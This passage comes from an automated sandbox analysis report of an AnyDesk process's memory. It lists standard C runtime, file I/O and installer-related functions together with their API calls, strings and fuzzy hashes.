                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B8B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$AllocHeap__cftoe
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 65443942-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ebc924c2332e86076350864936e9c1b66e3595a6f674e6de89cef5f83c113c2
                                                                                                                                                                                                                                                  • Instruction ID: f990bdf32ceaa5bdc9a574ebe164207b7367d3780bc1e653d5241ce6ff2ae24f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ebc924c2332e86076350864936e9c1b66e3595a6f674e6de89cef5f83c113c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7512C36B04205ABDB10CFA8ED81FAD77B8BF49B64F108229E825E6281FB35D5118775
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4DB10 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: ad876e0d40689751439811bd681239b75c2037bb68574cbf1202f9ac780aae20
                                                                                                                                                                                                                                                  • Instruction ID: d80c71bf7828a8826a55e650290669106038e5b8c3364bebafcbe71577cc52f6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad876e0d40689751439811bd681239b75c2037bb68574cbf1202f9ac780aae20
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E41F036F402009FCB14DF78D981A5AB7F5EF89B14F1181AAE915EF381EB31A901CB81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C52171 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 0fc3b217f0d6cf1ce1c0e0f5abe0857497b5959951e1aec6f056f6c4bdd8785d
                                                                                                                                                                                                                                                  • Instruction ID: e5dbf113ee24d703c38c7f6268f79904a8f0ba7735af938b9152f6c07b628d67
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fc3b217f0d6cf1ce1c0e0f5abe0857497b5959951e1aec6f056f6c4bdd8785d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88419F356406009FEB15CF2AE851B5AB3F0FF98724B10866DD44BDA2A1F731DA62CB48
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C66578 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C66D68: ReadFile.KERNEL32(00000028,00000000,0000001C,0000001C,00000000,0000001C,00000000,00000000,?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D8A
                                                                                                                                                                                                                                                    • Part of subcall function 69C66D68: GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D94
                                                                                                                                                                                                                                                    • Part of subcall function 69C66D68: GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D9F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000001C,00000000,00000000), ref: 69C665B7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$FileRead
                                                                                                                                                                                                                                                  • String ID: , observed $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io.cc$read$read: expected
                                                                                                                                                                                                                                                  • API String ID: 3644057887-3298404683
                                                                                                                                                                                                                                                  • Opcode ID: 9bb93a4095b997ee8bc3933a25fbfab6c3ce6b0dc35c8d27fa32eeb88dd74aa2
                                                                                                                                                                                                                                                  • Instruction ID: 9fe133d635cf75672a5bb0b2f6b4dbf4266113771bc13fe009e4f95d4be4dc3a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bb93a4095b997ee8bc3933a25fbfab6c3ce6b0dc35c8d27fa32eeb88dd74aa2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6215B3554071435DF24EA64FEA7FAD7719EF01368F50945AFD046A0D2FF3299414464
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C66663 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C66DDA: WriteFile.KERNEL32(0000001C,000000FF,69C66334,00000000,00000000,?,?,69C6668C,?,0000001C,69C66334,69C66334,000000FF,0000001C), ref: 69C66DF1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,000000FF,0000001C,00000001), ref: 69C666A2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                  • String ID: , observed $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io.cc$write$write: expected
                                                                                                                                                                                                                                                  • API String ID: 442123175-2204066763
                                                                                                                                                                                                                                                  • Opcode ID: 4b6e522d72fcfbe9fdd9001fd0ad95922c419d9bd9e37025a32aad9f20258b55
                                                                                                                                                                                                                                                  • Instruction ID: c09382b090d5002446936005d5c0cdb503b567d7c532e1d0fbd80aaec8dc0ac5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b6e522d72fcfbe9fdd9001fd0ad95922c419d9bd9e37025a32aad9f20258b55
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5215B395407182AEB24EA64FDA6FAD3759EF01368F509459E9052E0D2FF3299414064
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C62974 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 69C629F9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • microsoft-edge:, xrefs: 69C62991
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\chrome\installer\util\google_chrome_distribution.cc, xrefs: 69C62A03
                                                                                                                                                                                                                                                  • <, xrefs: 69C629A4
                                                                                                                                                                                                                                                  • Failed to launch Edge for uninstall survey, xrefs: 69C62A16
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID: <$Failed to launch Edge for uninstall survey$c:\b\build\slave\win\build\src\chrome\installer\util\google_chrome_distribution.cc$microsoft-edge:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-2957470658
                                                                                                                                                                                                                                                  • Opcode ID: fc0a4aeec97170dd8bccd3f5fb9dff71773aba3212cd966dde5d928c18cc55ab
                                                                                                                                                                                                                                                  • Instruction ID: c6d646ceb09cfbcd287083bd7f8afc9c9dc7fdeecf11ac667e3ea181e08999fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc0a4aeec97170dd8bccd3f5fb9dff71773aba3212cd966dde5d928c18cc55ab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1821957494030C9EDB14DFA4ECA1BEEB7B8EB05308F405056D915AA1C1FB755606CB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5774E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 69C57757
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 69C5777A
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 69C577A0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C577B3
                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 69C577C2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2278895681-0
                                                                                                                                                                                                                                                  • Opcode ID: 8e4e59301f9f954a71003d92c81e41ade1cea1e40d7acaf1c7f171e7079cc2a5
                                                                                                                                                                                                                                                  • Instruction ID: c13b4985163d2c83b96a05e1145d6e6366632531b33a3fac8bae849deecc18e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e4e59301f9f954a71003d92c81e41ade1cea1e40d7acaf1c7f171e7079cc2a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB01B1766016657B2B12497B7C9CC7B2ABDEAC6AE03008129BD19C2210FA61CC6291B5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4FC9E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,69C460F1,00000000,?,?,69C46175,00000000,00000000,00000000,00000000,00000000,0000010C,69C322CA), ref: 69C4FCA3
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FCD8
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FCFF
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,0000010C,69C322CA), ref: 69C4FD0C
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,0000010C,69C322CA), ref: 69C4FD15
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 08b746ec88f2cc767dcfd01b37ed8ba42adf5ecd25cd7f6b282c6bbe93331e31
                                                                                                                                                                                                                                                  • Instruction ID: f11e7eea43045784bfd1c7baf03ccfc903831d2c7a6b171cd488a2842af861d2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b746ec88f2cc767dcfd01b37ed8ba42adf5ecd25cd7f6b282c6bbe93331e31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F801F93A3846516FE7125D297E44E5F223DAFC3FB97215025FC01A2281FF208806A171
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C59D6D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59D85
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59D97
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59DA9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59DBB
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59DCD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: c833178f246cacef0d550a646a94e2bc2f61555b985282c7e38173d6c2afd68e
                                                                                                                                                                                                                                                  • Instruction ID: bf0940333f0b2532170e5da799a519e847c78163a957ea9fecb205641815c772
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c833178f246cacef0d550a646a94e2bc2f61555b985282c7e38173d6c2afd68e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90F096725047545BEF00DB58F081C5773F9FA81B24790C846FC59EB550E731F8A58694
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5F4F1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F564: GetVersionExW.KERNEL32(0000011C), ref: 69C5F59E
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F711: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 69C5F744
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F711: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 69C5F759
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F711: FreeSid.ADVAPI32(?), ref: 69C5F769
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 69C5F50F
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 69C5F516
                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,00000000), ref: 69C5F53A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5F547
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5F553
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Token$CloseHandleProcess$AllocateCheckCurrentFreeInformationInitializeMembershipOpenVersion
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3927590866-0
                                                                                                                                                                                                                                                  • Opcode ID: 54f257d3a3368ceb7a5c4342bb50bee0bc4e714fc8276e46f349524861c30a26
                                                                                                                                                                                                                                                  • Instruction ID: ed7db9ac26be11ebd30baa199087140f87b114bcb5711b66d83c2d83eb523c76
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54f257d3a3368ceb7a5c4342bb50bee0bc4e714fc8276e46f349524861c30a26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F019B5900218EFDF04DFE1A909BAD7BBCAF06359F804090AA5696081E7719629FB16
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C2F2B0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2F453
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2F45D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 934aa1f543073766f83cc338f2411068fe56e67913036ae8edbb69202f15ef77
                                                                                                                                                                                                                                                  • Instruction ID: 61b8baf3bb81227ca3335b1c4d8168fb133d6810f4e2a3624a13f0f54164463b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 934aa1f543073766f83cc338f2411068fe56e67913036ae8edbb69202f15ef77
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A151AC7160021D9FCB24CF69F8D085EB3A9FF887447604A2EE856CB250FB71E951DBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C26750 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 172COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2684A
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C26854
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
